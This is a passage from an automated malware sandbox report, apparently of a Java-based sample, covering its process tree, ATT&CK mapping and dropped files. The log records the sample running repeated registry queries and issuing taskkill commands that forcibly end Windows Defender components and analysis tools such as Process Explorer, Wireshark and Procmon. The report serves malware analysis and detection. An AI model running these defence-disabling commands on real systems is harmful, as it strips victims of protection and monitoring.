                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3300
                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4328
                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:3840
                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4116
                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:3200
                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:3980
                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:4784
                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:1536
                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                            PID:4620
                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:2004
                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:4496
                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:2224
                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:1364
                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:4516
                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:1724
                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:4344
                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:4224
                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:4200
                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4824
                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:4384
                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4436
                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:1496
                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4860
                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:4396
                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                          PID:4280
                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:1588
                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5052
                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4664
                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:2756
                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4624
                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:4772
                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:4764
                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:800
                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:2248
                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:4320
                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4960
                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:4296
                                                                                                                                                                                                                                                                                • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                  PID:4404
                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:4560
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:4756
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:4036
                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:4676
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:4648
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:1276
                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:1324
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:1960
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:1252
                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:5104
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:3932
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:4156
                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:4116
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:4788
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:4784
                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:2668
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:4220
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:4944
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:3960
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:4428
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:964
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:2760
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:4636
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:4172
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:4384
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:4452
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:4876
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:4396
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:4420
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:4588
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:1764
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:928
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4688
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4820
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4388
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:4364
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                          PID:3416
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:3644
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:4472
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4144
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:4448
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:4088
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:4824
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:2388
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:4536
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:1772
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:3948

                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1158

                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1158

                                                                                                                                                                                                                                                                                                                                                            Impact

                                                                                                                                                                                                                                                                                                                                                            Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1490

                                                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\.ntusernt.ini
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\hmJMe\Desktop.ini
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\hmJMe\Lwqbj.class
                                                                                                                                                                                                                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\WyQnhjYmDj7209558232339859040.xml
                                                                                                                                                                                                                                                                                                                                                            • memory/408-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/408-54-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/412-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/412-67-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/536-94-0x0000026FC9620000-0x0000026FC9621000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                                                                                            • memory/536-69-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/536-105-0x0000026FE1930000-0x0000026FE1931000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                              4KB

